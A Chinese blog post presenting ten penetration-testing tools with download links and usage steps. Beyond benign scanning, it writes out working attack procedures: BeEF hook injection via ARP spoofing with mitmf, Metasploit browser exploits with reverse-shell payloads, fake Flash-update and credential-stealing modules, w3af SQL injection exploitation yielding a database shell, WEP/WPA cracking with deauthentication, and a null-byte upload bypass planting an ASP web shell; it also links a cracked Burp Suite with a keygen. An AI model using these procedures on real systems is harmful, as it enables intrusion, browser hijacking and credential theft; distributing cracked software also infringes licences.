首页 » PHP教程 » phpgetparameters技巧_分享10个渗透测试最佳对象的运用方法及下载链接

phpgetparameters技巧_分享10个渗透测试最佳对象的运用方法及下载链接

访客 2024-11-17 0

扫一扫用手机浏览

文章目录 [+]

利用方法:

测试的IP为:163.177.151.110

phpgetparameters技巧_分享10个渗透测试最佳对象的运用方法及下载链接

Nmap的纯扫描

phpgetparameters技巧_分享10个渗透测试最佳对象的运用方法及下载链接
(图片来自网络侵删)

以下命令的语法如下:nmap <目标IP地址>个中:目标IP地址=您的目标机器的指定IP

NMAP普通扫描增加输出冗长(非常详细)以下命令的语法如下:nmap -vv 10.1.1.254个中:-vv =切换以激活日志所需的非常详细的设置

Nmap的自定义端口扫描Nmap的扫描范围从1-10000的端口默认情形下,为了更详细地指定要扫描的端口,我们将利用-p开关来指定我们的端口扫描范围,优点是它会更快扫描少量端口而不是预定义的默认值语法:nmap -p(范围)<目标IP>个中:-P是端口交流机(范围)是1-65535的端口数 <目标IP>是您的特定目标IP地址

该工具可以创建一个全面的网络虚拟舆图,并利用它来查明网络攻击者可以利用的所有紧张弱点。
NMAP对渗透测试过程的任何阶段都很有用。
最主要的是,它是免费的。

Netsparker Security Scanner

下载地址:https://www.netsparker.com/web-vulnerability-scanner/

利用方法:

打开工具,点击start a new scan,选择full scan(全部扫描),单击开始

在登录下进行扫描

等待扫描结果,并剖析

可用的功能将帮助你确定该当利用的预先打包的漏洞,并且还许可你自定义它们;还可以利用IP地址和远程端口号配置它们。
此外,还可以利用IP地址和本地端口号配置有效负载。
然后,你可以在启动预期目标的漏洞之前确定要支配的有效负载。

Metasploit还集成了一个名为Meterpreter的工具,它可以在漏洞发生时显示所有结果,这意味着你可以绝不费力地剖析和解释结果,并更有效地制订策略。

BeEF

下载地址:https://github.com/beefproject/beef

安装办法:

git clone git://github.com/beefproject/beef.git

cd beef

bundle install

ruby beef

利用办法:

修正配置文件/usr/share/beef-xss/config.yaml

(1)改vi beef侦听端口: http: port:3000(比如改为80)

(2)与Metaspolit关联:

metasploit: enable: false(改为true)

like:ssl: false(改为true)

(3) 配置一下拓展下的metasploit配置文件

vim /usr/share/beef-xss/extensions/metasploit/config.yaml

下面的路径为本机metasploit的路径。

然后开启metasploit的干系做事开启:# service postgresql start

在命令行下用msfconsole把掌握台打开

接着加载beEF,所用命令为:“load msgrpc ServerHost=127.0.0.1 Pass=abc123”

或者直接用这个命令启动:

msfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123"

下面我们来启动beef

cd /usr/share/beef-xss/ && ./beef -x

为了方便,写个启动脚本

#!/bin/bashservice postgresql startmsfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123"cd /usr/share/beef-xss && ./beef -x

接口掌握面板可以通过http://192.168.1.104:3000/ui/panel来访问

默认username/passwd是 beef:beef

掌握界面

默认hook js:http://192.168.1.104:3000/hook.js

默认hook页面: http://192.168.1.104:3000/demos/basic.html   //访问即可被hook

好了,现在统统都已经准备好,让我们用php编写一个程序进行测试

vim /var/www/index.html

<html>  <head>    <script src="http://192.168.1.104:3000/hook.js"></script>  </head></html>

如果是内网,也可以利用欺骗挟制勾住目标浏览器,比如利用mitmf(要以管理员权限运行)

mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --hsts --inject --js-url http://192.168.1.104:3000/hook.jsmitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.129 --inject --html-url http://192.168.1.104:3000/demos/basic.html

钩住目标浏览器后,我们可以利用社会工程来利用户接管扩展。
(Social Engineering中的模块)

比如:可以发送叫做:HTML5 Rendering Enhancements的扩展给用户,它会通过 1337 端口打开 shell。

还可以合营metasploit进一步获取权限。
如:

use exploit/windows/browser/java_cmmset payload windows/meterpreter/reverse_tcp

天生url之后,注入目标浏览器中,进而在msf中获取shell

再比如这个模块

use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.1.104set URIPATH /

我们我们可以看到每一个tab代表一个浏览器,它有5个tab-总结如下: Details-显示被hook的浏览器的细节。
如上图所示 Logs-显示当前浏览器的log实体。
如下图所示

commands-我们可以对一个浏览器实行模块。
模块可以实行可以通过JavaScript来实行的任何命令。
每一个模块有一个图标,表示为如下色彩:

Green : 可以事情; user不可见 Orange :可以事情; user可见 Grey : 可能事情 Red : 不能事情

一些实用模块:

Redirect Browser:进行重定向

方法:右侧填写木马的路径,可以合营插件升级攻击

Social Engineering --> Fake Flash Update

flash插件升级

Social Engineering --> Fake Notification Bar

功能类似插件升级

Social Engineering --> Clippy

Social Engineering --> Pretty Theft

盗取上岸凭据

Misc --> Create Invisible Frame

注入一个隐蔽的iframe框架

Metasploit实用姿势

利用Metasploit的Browser Autopwn功能天生一个浏览器攻击链接

use auxiliary/server/browser_autopwn

show options

set LHOST xxx

set SRVHOST xxx

set SRVPORT xxxx<br>run -z

利用"Create Invisible Iframe"模块加载autopwn页面

hook手机

由于手机打开网址持续的韶光很短,关闭当前页面后BeEF的shell就会下线,因此我们可以利用BeEF API,用户上线后能够自动实行批量命令,结合Persistence模块能够极大提高shell存活韶光。
除了与windows系统干系的信息无法获取,其他操作均能成功实行,并且BeEF为手机挟制供应了专门的模块系列——Phonegap

以下是经测试可以在Android上利用的模块:

1、弹框2、重定向 3、查看是否访问过某些网站4、Creates an invisible iframe5、Social Engineering系列,如下图,仅作演示 6、msf系列7、NetWork系列,可以用来扫描同一内网下的windows主机

BeEF工具最适宜检讨Web浏览器,由于它紧张用于对抗web攻击。
这便是为什么它最有利于移动的客户。
此工具利用GitHub查找漏洞,此工具的最佳之处在于它探索了web边界和客户端系统之外的弱点。
请记住,这是专门针对Web浏览器的,由于它会查看单个源高下文中的漏洞。
它连接多个Web浏览器,许可你启动定向命令模块。

Wireshark

下载地址:https://www.wireshark.org/download.html

利用方法:

1、打开wireshark 2.6.5,主界面如下:

2、选择菜单栏上Capture -> Option,勾选WLAN网卡(这里须要根据各自电脑网卡利用情形选择,大略的办法可以看利用的IP对应的网卡)。
点击Start。
启动抓包。

3、wireshark启动后,wireshark处于抓包状态中。

4、实行须要抓包的操作,如ping www.baidu.com。

5、操作完成后干系数据包就抓取到了。
为避免其他无用的数据包影响剖析,可以通过在过滤栏设置过滤条件进行数据包列表过滤,获取结果如下。
解释:ip.addr == 119.75.217.26 and icmp 表示只显示ICPM协议且源主机IP或者目的主机IP为119.75.217.26的数据包。

5、wireshark抓包完成,就这么大略。
关于wireshark过滤条件和如何查看数据包中的详细内容在后面先容。

Wireshakr抓包界面

解释:数据包列表区中不同的协议利用了不同的颜色区分。
协议颜色标识定位在菜单栏View --> Coloring Rules。
如下所示

该工具供应的最大上风是剖析结果的产生办法利用户轻松理解。
渗透测试者可以利用此工具实行许多不同的操作,包括颜色编码,以便进行更深入的调查,并隔离最主要的单个数据包。
在剖析基于Web的运用上发布到表单的信息和数据所固有的安全风险时,此工具非常方便。

w3af

下载地址:http://w3af.org/download

利用方法:

root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_console

0x04 漏洞扫描配置

w3af>>> plugins//进入插件模块w3af/plugins>>> list discovery //列出所有用于创造的插件w3af/plugins>>> discovery findBackdoor phpinfo webSpider //启用findBackdoor phpinfo webSpider这三个插件w3af/plugins>>> list audit //列出所有用于漏洞的插件w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //启用blindSqli fileUpload osCommanding sqli xss这五个插件w3af/plugins>>> back//返回主模块w3af>>> target//进入配置目标的模块w3af/config:target>>> set target http://192.168.244.132///把目标设置为http://192.168.244.132/w3af/config:target>>> back//返回主模块

0x05 漏洞扫描

w3af>>> start

---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//开始扫描

0x06 漏洞利用配置

w3af>>> exploit //进入漏洞利用模块w3af/exploit>>> list exploit//列出所有用于漏洞利用的插件w3af/exploit>>> exploit sqlmap //利用sqlmap进行SQL注入漏洞的测试

---Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] <sql object ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>Please use the interact command to interact with the shell objects.---//测试存在SQL注入漏洞//这里要记住shell objects(这里是0),等一下要用到0x07 漏洞利用w3af/exploit>>> interact 0//interact + shell object就可以利用了---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0>>> ---//sqlmap的一个交互式模块w3af/exploit/sqlmap-0>>> dbs ---Available databases: [3]:

使W3AF成为一个完全工具的缘故原由是参数和变量可以快速保存到会话管理器文件中。
这意味着它们可以快速重新配置并重新用于Web运用上的其他渗透测试,从而为你节省大量韶光,由于你不必在每次须要时重新输入所有参数和变量。
此外,测试结果以图形和文本格式显示,使其易于理解。

Acunetix Scanner

下载地址:http://www.downza.cn/soft/286127.html

利用方法:

1、选择“Tools Explorer”下的“Web Scanner”,鼠标右键涌现选项菜单,选择“ New scan”

弹出“Scan Wizard”扫描引导,输入您所要测试的网址

然后一贯点击下一步,如果要测试的网站是须要上岸才能进入的web,则配置一下上岸信息,点击“New Login Sequence”按照步骤一步一步上岸,让软件记录下你的登 录信息。
完成之后连续next。

当涌现下图的操作时,则解释准备事情已经做好,点击“finish”按钮,可以开始扫描

扫描结束后如下图所示:

它涵盖了超过4500个弱点。
登录序列记录器易于利用;它会扫描受密码保护的区域。
该工具包含AcuSensor技能,手动渗透工具和内置漏洞测试。
它可以快速抓取数千个网页,也可以在本地或通过云办理方案运行。

John the Ripper

下载地址:https://www.openwall.com/john/

利用方法:

【命令列指令】

john [-命令列参数] [密码档名称]

【命令列參數】

参数:-single 解释:利用「大略」(Single Crack)破解模式解密,紧张是根据利用者的「账号」产生变革来预测解密,其变革规则记录在JOHN.INI档案的 [List.Rules:Single] 区域內。
(稍后会再先容)

案例1:john -single passwd

参数:-wordfile:[字典档档名] -stdin

解释:利用「字典档」破解模式解密,由字典档内读取单字来破解;或是可以加上-stdin参数,代表由键盘输入单字来破解。

案例2:john -wordfile:bigdict.dic passwd

参数:-rules 解释:在「字典档」破解模式下,开启字词规则变革功能,如「字典档」读入单字cook,則开启字词变革下,程式可能会考试测验cook、c00k、 cooker、cook0…等其它字词。
详细变革规则记录在JOHN.INI档案的 [List.Rules:Wordlist] 区域內。
(稍后会再先容)

案例3:john -wordfile:bigdict.dic -rules passw

参数:-incremental[:模式名称](参数也可以简写成 -i[:模式名称])解释:利用「增强」破解模式解密,便是组合所有可能的资源当作密码来破解。
在 JOHN.INI档案内的 [Incremental:] 区域里定义好许多的模式名称,可以指定利用哪一個模式来破解。
(稍后会再介紹)

案例4:john -i:all passwd

参数:-external:[模组名称]解释:利用「外挂模组」破解模式解密,利用者可以自己撰写额外的「破解模组程式」。
「破解模组程式」是记录在JOHN.INI档案內的 [List.External:] 区域内。

这是一个众所周知的工具,是一个非常优雅和大略的密码破解工具。
此工具许可你确定数据库中的任何未知弱点,它通过从传统字典中找到的繁芜和盛行单词的单词列表中获取文本字符串样本,并利用与正在天生的密码相同的格式对其进行加密来实现此目的。
大略而有效的John the Ripper是任何精心准备的渗透测试仪工具包中的一个强烈推举的补充。

Aircrack mainly

下载地址:http://aircrack-ng.org/

利用方法:

Ifconfigwlan0 up 挂载无线网卡

Airmon-ngstart wlan0 激活无线网卡为监听模式

Airodump-ngmon0抓包

Airodump-ng –ivs –w shujubao –c 6 wlan0 抓包并保存

--ivs 这里是设置过滤,只保存用于破解的ivs文件,可以不加这个参数的,信道是多少写多少,一样平常是6,这个可以在抓包的时候看到,这一步可能会抓到好几个路由器的报文,选择自己要的便是了。

Airplay-ng -3 –b 目标MAC –h 客户端MAC mon0

-3是指采取arprequesr注入模式(后面会提到参数0)

等待一段韶光,详细等多少,便是等1000个以上的数据包吧,保险可以多等一会

Aircrack-ng shujubao-01.ivs 进行破解了,这种模式好破,当然拿windows下面破利用GPU加速更快。

Wpa加密破解:

前面都一样抓包的时候利用如下命令:

Airodump-ng -c 6 –w shujubao mon0

Aireplay-ng -0 10 –a 目标MAC –c 客户端MAC wlan0(参数与WEP有很大不同)

-0采取deauth模式,后面是次数,一样平常1次有效就好了。

屏幕上涌现了:WPA handshake解释抓到了握手包

Aircrack-ng –w dic shujubao-01.cap

这里面须要自己制作字典,建议在win下面破解,字典工具也多,自己做一个就好了。
也可以扔到网站上破解,他们该当有超大的彩虹表吧,个人觉得对付繁芜的wpa2密码,这种办法不是很好用,运气不好,要破几个月也是有可能,当然我没有验证,Burp Suite Pen Tester

下载地址:https://pan.baidu.com/s/1mJdRZqSr5A0W9aWEcs3ySg 密码: 293x (压缩包内已包含注册机Loader)

运行Burp site,点击Proxy标签,确认Options选项卡下,Proxy listeners的running运行正常(勾选状态为运行),如果端口打开失落败,可能的缘故原由是有程序占用了该端口,点击edit,在local listener port:输入框输入一个未占用的端口,点击update即可。
我这里将端口改为了8082

打开http://192.168.8.120/test/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg,进入上传页面,选择我们的asp木马,然后设置浏览器代理地址为127.0.0.1,端口为8082,点击开始上传,burp suite截获数据包,点击forward按钮,返回结果如图所示。

到这里所用到的数据包已经成功捕获,切换到history选项卡,右键刚刚捕获的post数据包,选择send to repeater。

变动filepath值”bookpic/”为”bookpic/shell.asp “(asp后有一空格),然后把filename的值”C:\Documents andSettings\Administrator\Desktop\unset.asp”改成”C:\Documents andSettings\Administrator\Desktop\unset.jpg”,Content-Length的值不用变动,程序会在提交要求的时候自动更新该值。

然后切换到hex选项卡,找到上传路径”bookpic/shell.asp “所处位置,把20改成00,然后点击GO,成功上传aspshell到http://192.168.8.120/test/bookpic/shell.asp。

此工具包含成功实行扫描活动和高等渗透测试的所有基本要素,使其成为检讨基于Web运用的空想选择,由于它包含用于剖析目标做事器和浏览器之间要求的工具。
它通过在Java平台上利用Web渗​透测试来实现。
它可用于许多不同的操作系统,包括Windows,Linux和OS X.

标签:

相关文章

首府SEO,介绍城市搜索引擎优化之路

搜索引擎优化(SEO)已成为企业品牌推广、产品营销的重要手段。首府作为城市的核心区域,拥有丰富的商业资源和庞大的消费市场。如何利用...

PHP教程 2025-03-20 阅读0 评论0

亚马逊关键词优化,助力厂商抢占电商蓝海

电子商务已成为全球最大的消费市场之一。在亚马逊这个全球领先的电商平台上,厂商要想在激烈的市场竞争中脱颖而出,关键词优化显得尤为重要...

PHP教程 2025-03-20 阅读0 评论0

东莞,粤港澳大湾区核心引擎的崛起之路

东莞,位于珠江口东岸,是粤港澳大湾区的重要城市之一。东莞以其独特的区位优势、完善的产业基础、创新的发展理念,成为国内外瞩目的焦点。...

PHP教程 2025-03-20 阅读0 评论0

SEO在国内的发展趋势与步骤讨论

搜索引擎优化(SEO)已经成为了企业提升品牌知名度、扩大市场份额的重要手段。在我国,SEO行业已经经历了多年的发展,从最初的简单关...

PHP教程 2025-03-20 阅读0 评论0

SEO哲学,介绍搜索引擎优化之路

搜索引擎已经成为人们获取信息的重要途径。搜索引擎优化(SEO)作为一种提高网站在搜索引擎中排名的技术,越来越受到企业和个人的关注。...

PHP教程 2025-03-20 阅读0 评论0